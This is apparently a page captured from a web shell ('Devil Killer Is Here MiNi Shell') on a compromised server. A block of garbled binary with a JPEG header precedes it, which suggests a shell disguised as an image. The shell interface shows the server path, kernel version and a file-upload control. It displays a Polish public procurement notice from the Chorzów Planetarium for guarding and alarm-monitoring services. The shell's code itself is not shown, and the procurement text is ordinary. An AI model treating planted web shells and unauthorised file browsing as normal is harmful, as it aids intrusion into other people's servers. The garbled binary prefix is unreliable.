JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220210/0005396401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi w zakresie ochrony fizycznej (dozoru) obiektów i mienia, monitoringu wizyjnego, monitoringu sygnałów alarmowych budynków w Planetarium i Obserwatorium Astronomicznym w Chorzowie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Planetarium i Obserwatorium Astronomiczne im. M. Kopernika</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Planetarium Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000195854</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Planetarium 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chorzów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@planetarium.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.planetarium.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi w zakresie ochrony fizycznej (dozoru) obiektów i mienia, monitoringu wizyjnego, monitoringu sygnałów alarmowych budynków w Planetarium i Obserwatorium Astronomicznym w Chorzowie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4d8b07db-842b-11ec-83b1-bea871b78b5b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00053964</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033727/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ochrona fizyczna wraz z monitoringiem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal<br/><br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma<br/>dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do<br/>komunikacji.<br/><br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z mini portalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 oraz art. 15 ust. 1 i 3 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej RODO), obowiązującego od 25 maja 2018 r., informuję, iż:<br/>1.Administratorem Danych Osobowych jest Planetarium i Obserwatorium Astronomiczne im. M. Kopernika w Chorzowie, Aleja Planetarium 4, 41-500 Chorzów. Kontakt z administratorem jest możliwy także za pomocą adresu mailowego: sekretariat@planetarium.edu.pl<br/>2.Kontakt z inspektorem jest możliwy za pomocą adresów mailowych: aleksandra@eduodo.pl lub iod@eduodo.pl, <br/>3.Państwa dane osobowe przetwarzane będą w związku z postępowaniem o udzielenie zamówienia publicznego do 130.000,00 zł prowadzonym w trybie nie podlegającym ustawie Prawo zamówień publicznych w celu związanym z potrzebą wyłonienia wykonawcy w ramach postępowań o udzielenie zamówienia lub organizacji konkursu realizowanych w trybie wynikającym z odpowiednich przepisów prawa lub w celu zawarcia, realizacji rozliczenia umowy z administratorem. Państwa dane osobowe przetwarzane będą zgodnie art. 6 ust.1 lit. b RODO (w celu zawarcia umowy) lub art.6 ust.1 lit. c RODO (obowiązki prawne ciążące na administratorze), innych krajowych lub unijnych przepisów odnoszących się do zamówień i konkursów, przedmiotu umowy oraz ochrony danych osobowych, w szczególności na podstawie przepisów ustawy z dnia 23 kwietnia 1964 r. – KC oraz wewnętrznych procedur i regulaminów obowiązujących u Administratora.<br/>4.Odbiorcami Pani/Pana danych osobowych mogą być: <br/>a)osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania,<br/>b)organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa, <br/>c)inne podmioty, które na podstawie stosownych umów przetwarzają dane osobowe administratora, <br/>5.Pani/Pana dane osobowe przechowywane będą przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność. Jeśli czas trwania umowy przekracza cztery lata, zamawiający przechowuje umowę przez cały czas trwania umowy. <br/>6.Pani/Pana dane osobowe nie będą przekazywane do państw trzecich lub organizacji międzynarodowych, <br/>7.Ma Pani/Pan prawo żądania od Administratora: <br/>a)dostępu do swoich danych oraz otrzymania ich pierwszej kopii. Administrator dostarcza osobie, której dane dotyczą, kopię danych osobowych, które podlegają przetwarzaniu. Za wszelkie kolejne kopie, o które zwróci się osoba, której dane dotyczą, administrator może pobrać opłatę w rozsądnej wysokości, wynikającej z kosztów administracyjnych. Jeśli wykonanie wyżej wymienionego obowiązku wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji, mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu, <br/>b)do sprostowania swoich nieprawidłowych danych osobowych lub uzupełnienia swoich niekompletnych danych osobowych. Skorzystanie z tego prawa nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z przepisami prawa,<br/>c)do usunięcia danych osobowych wyłącznie na podstawie art. 17 RODO, <br/>d)do ograniczenia przetwarzania danych osobowych na podstawie art. 18 RODO. Prawo do ograniczenia przetwarzania danych osobowych nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego,<br/>e)do wniesienia sprzeciwu wobec przetwarzania danych, jeśli nie występują prawnie uzasadnione podstawy przetwarzania i na zasadach opisanych w art. 21 RODO, <br/>f)do przenoszenia danych, zgodnie z art. 20 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje o ograniczeniach stosowania przepisów rozporządzenia 2016/679:a) Skorzystanie przez<br/>osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Prawo Zamówień Publicznych. b) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PLS-SJ.253.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa w zakresie ochrony fizycznej (dozoru) obiektów i mienia, monitoringu wizyjnego, monitoringu sygnałów alarmowych budynków na rzecz Planetarium i Obserwatorium Astronomicznym im. M. Kopernika w Chorzowie.<br/>2.	Przedmiot zamówienia obejmuje: ochronę budynku przy Alei Planetarium 4 w Chorzowie wraz z ogrodzonym budynkiem Stacji Klimatologicznej, budynkiem małego obserwatorium oraz wieży widokowej znajdujących się na kompleksie Planetarium.<br/>	a) W okresie obowiązywania umowy, dozór i ochrona będzie wykonywana przez trzy osoby, dwie w nocy od 18:00 do 6:00 a jedna w dzień od 6:00 do 18:00	w dni robocze i święta całodobowo.<br/>	b) Wykonywanie usługi będzie polegać na wypełnianiu przez Wykonawcę następujących obowiązków obejmujących:<br/>c) dozorowanie i ochrona majątku trwałego i ruchomego chronionego obiektu, celem zabezpieczenia obiektu i mienia przed kradzieżą, włamaniem, pożarem, zalaniem oraz innymi szkodami,<br/>d) zapobiegania aktom wandalizmu, powiadamiania Zamawiającego i Policji o takich próbach lub faktach zaistnienia,<br/>e) systematyczny obchód budynku wewnątrz przez pracownika ochrony, który zobowiązany jest do kontroli zabezpieczeń, zamknięć wejść (bramy, drzwi) i okien. <br/>f) stałą (telefoniczną lub radiową) łączność osoby dozorującej z Grupą Interwencyjną, a w przypadku zaistnienia niepożądanego zdarzenia reakcja (przyjazd) Grupy Interferencyjnej (po otrzymanym zgłoszeniu).<br/>g) stały monitoring systemów DSO, SAP, CCTV, SSWiN i innych lokalnych systemów alarmowych oraz serwisowanie urządzeń ( trzy kamery)do obserwacji w Stacji klimatologicznej. <br/>h) transport wartości pieniężnych – przewożenie wraz z konwojem wartości pieniężnych do 0,2 jednostki obliczeniowej do Banku ( do 10 km).<br/>i) Zamawiający wymaga aby zatrudnieni przez Wykonawcę pracownicy skierowani do realizacji zamówienia posiadali kwalifikacje zgodnie z ustawą z 22 sierpnia 1997 r. (Dz.U. z 2021r. poz.1995 t.j.) <br/>	Transport i konwojowanie zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 7 września 2010 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50340000-0 - Usługi w zakresie napraw i konserwacji urządzeń audiowizualnych i optycznych</p> <p class="mb-0">50610000-4 - Usługi w zakresie napraw i konserwacji sprzętu bezpieczeństwa</p> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <p class="mb-0">79714000-2 - Usługi w zakresie nadzoru</p> <p class="mb-0">98341140-8 - Usługi dozorowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-04-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Analiza ofert zostanie przeprowadzona komisyjnie przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji grupy interwencyjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) nie podlegają wykluczeniu na podstawie art. 108 ust. 1 Pzp, oraz 109 ust.1 pkt 4,<br/>z zastrzeżeniem art. 110 ust. 2 Pzp,<br/>2) spełniają warunki udziału w postępowaniu dotyczące uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów, Zamawiający uzna warunek dotyczący posiadania uprawnień, za spełniony jeżeli<br/>Wykonawca wykaże że posiada aktualną Koncesję udzieloną przez Ministra Spraw<br/>Wewnętrznych i Administracji na prowadzenie działalności w zakresie ochrony osób i<br/>mienia wydaną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i<br/>mienia (Dz.U. z 2020 r. poz. 838 t.j. ze zm.). <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) przedmiotową koncesja winien wykazać się Wykonawca bezpośrednio realizujący usługi objęte przedmiotem zamówienia.<br/>3) spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub<br/>zawodowej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona (przed wyborem najkorzystniejszej oferty), w celu wykazania braku podstaw (przesłanek) wykluczenia z postępowania (określonych przez Zamawiającego w pkt. 1,2,3 rozdziału VI SWZ), na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia w wyznaczonym terminie nie krótszym niż 5 dni aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j.: Dz. U. z 2021 r. poz.275), z innym Wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej;<br/>2) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 1 ustawy Pzp<br/>b) art. 108 ust. 1 pkt 2 ustawy Pzp<br/>c) art. 108 ust. 1 pkt 3 ustawy Pzp<br/>d) art. 108 ust. 1 pkt 4 ustawy Pzp,<br/>e) art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>f) art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>Uwaga: W przypadku Wykonawców wspólnie ubiegających się o zamówienie podmiotowe środki dowodowe, o których mowa pkt. 5 rozdział VI SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Uwaga: Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp przedstawienia podmiotowego środka dowodowego, o którym mowa powyżej, dotyczącego tych podmiotów, potwierdzającego, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.<br/>3) Zamawiający, na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp, przewiduje wykluczenie Wykonawcy z zastrzeżeniem art. 110 ust. 2 ustawy Pzp w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do<br/>złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na<br/>dzień złożenia następujących podmiotowych środków dowodowych:<br/>1)	wykazu usług (Załącznik nr 6 do SWZ) wykonanych, a w przypadku świadczeń<br/>okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów,<br/>na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających<br/>czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami,<br/>o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub<br/>ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>Wykonawca nie jest w stanie uzyskać tych dokumentów oświadczenie wykonawcy; w<br/>przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź<br/>inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert<br/>2) aktualnej koncesji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>dokument składa każdy z Wykonawców wspólnie ubiegających się o zamówienie w<br/>takim zakresie w jakim będzie on wykonywał usługę objętą uprawnieniem (koncesją)<br/>3) Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, na<br/>zasadach określonych w art. 118 Pzp, przedstawienia podmiotowych środków dowodowych, o których mowa w pkt. 3 ppkt 3 niniejszego Rozdziału, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz oferty sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do SWZ,<br/>2) oświadczenie, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału<br/>w postępowaniu wymagane na podstawie art. 125 ust. 1 ustawy Pzp, aktualne na dzień<br/>składania ofert (wzór załącznik nr 5 do SWZ),<br/>4) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału<br/>w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby (wzór<br/>załącznik nr 5a do SWZ),<br/>5) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji 